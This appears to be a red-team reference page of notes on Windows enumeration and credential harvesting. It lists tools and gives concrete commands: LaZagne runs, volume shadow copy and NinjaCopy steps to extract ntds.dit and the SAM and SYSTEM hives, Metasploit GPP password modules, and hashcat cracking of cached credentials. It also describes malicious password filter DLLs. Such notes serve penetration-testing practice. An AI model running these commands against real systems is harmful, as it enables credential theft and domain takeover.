Skip to content

Latest commit

 

History

History
362 lines (301 loc) · 25 KB

enumeration-and-harvesting.md

File metadata and controls

362 lines (301 loc) · 25 KB
description
All the ways to grab the goodies

Enumeration and Harvesting

Enumeration

{% tabs %} {% tab title="Guides" %}

{% tab title="Endpoint Tools" %}

  • JAWS - JAWS is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It
  • RedTeamScripts - Red Team Scripts is a collection of red teaming related tools, scripts, techniques, and notes developed or discovered over time during engagements. Invoke-HostEnum is the tool within these scripts that can perform windows host enumeration for any valuable data.
  • HostRecon - Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system, users, and domain information. It does not use any 'net', 'ipconfig', 'whoami', 'netstat', or other system commands to help avoid detection. {% endtab %} {% endtabs %}

{% hint style="info" %} Privilege escalation tools can also provide much of the enumeration that you need. {% endhint %}

{% content-ref url="privilege-escalation.md" %} privilege-escalation.md {% endcontent-ref %}

Harvesting and Credential Dumping

iRedTeam blog - https://www.ired.team/offensive-security/credential-access-and-credential-dumping

Endpoint Tools

{% tabs %} {% tab title="Endpoint Tools" %}

{% tab title="LaZagne" %}

LaZagne

LaZagne is an open-source tool used in post-exploitation to recover stored passwords on a system. Its modules support Windows, Linux, and OSX, but are primarily intended for Windows systems.
Software uses different techniques to save credentials, such as saving them to a plaintext file, local databases or credential managers. LaZagne is able to search for these common methods and retrieve any passwords it finds.
LaZagne is capable of extracting passwords from 87 different software applications from the following categories of software:
Browsers, Chats, Databases, Games, Git, Mails, Maven, Dumps from memory, Multimedia, PHP, SVN, Sysadmin, WIFI, and Internal mechanism password storage
The LaZagne tool along with a full list of software that it supports is available in the public GitHib repository.

https://www.youtube.com/watch?v=AwFyiFOXrd0

Using LaZagne on Windows

LaZagne's ability to retrieve stored credentials for Windows software is extensive and supports a large number of browsers including Chrome and Firefox, chat clients including Skype, databases, and mail clients including Outlook.
The tool also supports credential retrieval for many sysadmin utilities like OpenVPN and OpenSSH, and password managers such as KeyPass, which could provide valuable credentials for moving to other hosts in a network.

Usage

The Windows version comes with an executable (.exe) file that can be used as a standalone .exe; however, it is not able to detect some credentials such as Google Chrome passwords.
Simply double clicking on the executable ‘Lazagne.exe' will cause a warning message which indicates that the executable is malicious.

  • To run the tool successfully, use the command prompt to execute LaZagne:
    • > lazagne.exe
    • # Run all modules
      • > lazagne.exe all
    • # Run the browser modules
      • lazagne.exe browsers
  • There is also a Python script in the Windows directory of the LaZagne repository that can run on systems with Python installed. There are a few requirements that may need to be installed first – check the requirements.txt file in the repository for more details.
    • #python laZagne.py
    • # Run all modules
      • python laZagne.py all
    • # Run modules for Google Chrome. Add the -v flag for verbose output
      • python laZagne.py browsers -google -v {% endtab %}

{% tab title="Mimikatz" %} {% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md" %}

Mimikatz - Utility to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory but also perform pass-the-hash, pass-the-ticket or build Golden tickets

Endpoint Techniques

{% tabs %} {% tab title="Cred Locations" %}

Passwords in AD Attributes

Mining SMB Shares

Scripts stored in SYSVOL

Passwords in GPO

NTDS.DIT Password Extraction

{% tab title="Dump w/o LSASS" %}

{% tab title="Skeleton Key" %}

{% tab title="Vol. Shadow Copy" %}

Once you have Domain Admin access, the old way to pull all hashes from the DC was to run commands on the domain controller and user Shadow volume or Raw copy to pull the ntds.dit file

  • RTFM: Volume Shadow Copy - pg.21
  • Volume Shadow Copy technique (old)
    • NTDS.dit file is constantly being locked as in use by the OS.
    • We can use Volume Shadow Copy to make an copy of it we can extract hashes from
      • C:\vssadmin create shadow /for=C:
      • copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[DISK_NUMBER]\windows\ntds\ntds.dit
      • copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[DISK_NUMBER]\windows\system32\config\SYSTEM
      • copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[DISK_NUMBER]\windows\system32\config\SAM
      • reg SAVE HKLM\SYSTEM c:\SYS
      • vssadmin delete shadows /for=[/oldest | /all | /shadow=]
  • ALT
  • Listing shadow copy contents. This is tricky since the shadow copies are not regular (standalone) volumes. These are pseudo-volume devices, without a drive letter or volume name, in the form \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyNNN. You can still access their contents from the command line, if you know how. For example, copying a file from the shadow copy can be done this way:
    • dir > c:\somefile.txt
    • vssadmin create shadow /for=c:
    • vssadmin list shadows
    • (get the shadow copy device, let's say that this is \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12)
    • set VSHADOW_DEVICE=\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12
    • copy %VSHADOW_DEVICE%\somefile.txt c:\somefile_bak.txt
  • To enumerate all files on a shadow copy device we will use the "for /R" command. Note that we used %i and not %%i so the command below will not work properly in a CMD batch file:
    • dir > c:\somefile.txt
    • vssadmin create shadow /for=c:
    • vssadmin list shadows
    • (get the shadow copy device, let's say that this is \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12)
    • set VSHADOW_DEVICE=\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy12
    • for /R• %VSHADOW_DEVICE%\ %i in (*) do @echo %i {% endtab %}

{% tab title="NinjaCopy" %} NinjaCopy http://bit.ly/2HpvKwj

  • Copies file from an NTFS partition volume by reading the raw volume and parsing the NTFS Strucutres
  • This bypasses file DACL's, read handle blocks, and SACL's
  • This can be used to read SYSTEM files that are normally locked like NTDS.dit registry hives
  • > Invoke-NinjaCopy -Path “c:\Windows\ntds\ntds.dit” -LocalDestination "c:\Windows\temp\ntds.di {% endtab %}

{% tab title="DCSync" %} DCSync (Modern)

Windows Service Extraction

{% tabs %} {% tab title="Windows Native Tooling" %}

{% endtab %}

{% tab title="GPP Vuln" %} Group Policy Preference Vul

  • Info for accounts under GPP stored in a Groups.xml file that contains cpassword hash.
  • Uses a publiclally posed Microsoft AES , easy to find, easy to use
  • Exploit available Under powersploit script Get-GPPPassword.ps1
  • Metasploit module
    • >use post/windows/gather/credentials/gpp
    • >set SESSION [Session # of your shell]
    • >exploit
  • http://esec-pentest.sogeti.com/public/files/gpprefdecrypt.py
  • Net-GPPPassword - .NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. {% endtab %}

{% tab title="Cached Creds" %} Windows Cached Credentials

  • Windows caches the last 10 sets of credentials used on the device by default
  • Metasploit module - cachedump
  • Crack via hashcat
    • format: $DCC2$10240#account_name#hash
    • oclHashcat64.exe -m 2100 hashes \mscash2.txt lists \crackstat_realhuman_shill.txt
    • Warning: With a normal GPU this takes on average 20 days to crack {% endtab %}

{% tab title="PW Filter DLL" %}

Password FIlter DLL - used by Windows to enforce password strength policies.

  • System administrators can create password filter DLLs to ensure all password changes meet a minimum requirement.
  • New passwords are passed to the DLL in plaintext, allowing attackers to leverage this Windows feature to steal credentials.
  • Password changes on Windows are handled by the Local Security Authority (LSA). When a password change occurs, the LSA executes each registered password filter to check that the new passwords meets the specified requirements.
  • Each password filter must return ‘true’ for the password change to occur; if any of the filters return ‘false’, an error is displayed to the user. Password filters can be installed locally or on domain controllers (DCs).
  • Password filters are created as DLL files and placed in the ‘C:\Windows\System32’ directory.
  • Once in place, the new file must be registered by adding its name (without the .dll extension) to the registry entry HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages.
  • The DLL file is comprised of three functions, each of which performs a specific task when executed.
    • InitializeChangeNotify is called to notify the filter that a password change has been requested. This function returns true or false to indicate whether if the filter has initialised successfully.
    • PasswordFilter is called to validate the new password. This function contains the code to test the provided password and returns true or false to indicate if the password is valid.
    • PasswordChangeNotify is called to inform the filter if the password change was made successfully.
  • Password filter DLLs can be used by malicious actors to harvest account credentials. The PasswordFilter and PasswordChangeNotify functions both have access to the plaintext password and the name of the account whose password is to be changed. By installing a malicious password filter, attackers can exfiltrate every updated password to a remote server, local file or even block every password change by setting their filter’s PasswordFilter function to always return false.
  • Ensuring that appropriate permissions are set for the HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages key will prevent unauthorized users or groups from being able to register new filter {% endtab %} {% endtabs %}

Misc

Command Reference
  • General Enumeration
    • RTFM: Linux System Info - pg. 5
    • BTFM: Linux System Info - pg. 71
    • RTFM: Windows System Info - pg. 15
    • BTFM: Windows System Info - pg. 60
    • RTFM: WMI Info - pg. 20
    • RTFM: Powershell Info - pg. 22
    • RTFM: Registry Locations - pg. 26
  • Host Enumeration
    • Browser Information
      • PTFM: Browser Information- pg. 46
    • Virtual Machine Detection
      • PTFM: Windows VM Detection - pg. 47
      • PTFM: Linux VM Detection - pg. 106
    • Searching for cleartext passwords
      • PTFM: Windows Cleartext Passwords - pg. 40
      • PTFM: Linux Cleartext Passwords - pg. 102
    • Credential Dumping
      • PTFM: Windows Credential Dumping - pg. 41
      • PTFM: Linux Credential Dumping - pg. 102
    • Firewall settings
      • BTFM: Windows Firewall - pg. 22
      • BTFM: Linux Firewall - pg. 35
  • Active Directory
    • BTFM: AD Inventory - pg. 16
  • Email collection
    • PTFM: Email Collection - pg. 59